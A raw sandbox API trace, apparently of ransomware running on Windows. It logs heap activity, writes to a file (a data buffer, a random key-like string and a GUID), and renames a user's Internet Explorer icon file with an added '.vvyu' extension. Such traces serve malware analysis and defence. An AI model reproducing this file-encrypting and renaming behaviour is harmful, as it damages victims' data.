[0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cf68 | out: hHeap=0x6a0000) returned 1 [0196.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.694] WriteFile (in: hFile=0x52c, lpBuffer=0x2d3a670*, nNumberOfBytesToWrite=0x10b9, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d3a670*, lpNumberOfBytesWritten=0x30ffb14*=0x10b9, lpOverlapped=0x0) returned 1 [0196.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.694] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x10be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.694] WriteFile (in: hFile=0x52c, lpBuffer=0x2c31700*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c31700*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.696] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.696] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.696] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.696] CloseHandle (hObject=0x52c) returned 1 [0196.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0196.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x900) returned 0x2d3a670 [0196.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.698] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico.vvyu" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico.vvyu")) returned 1 [0196.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.702] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.704] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7525ca20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 0 [0196.705] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.705] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0196.705] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.735] 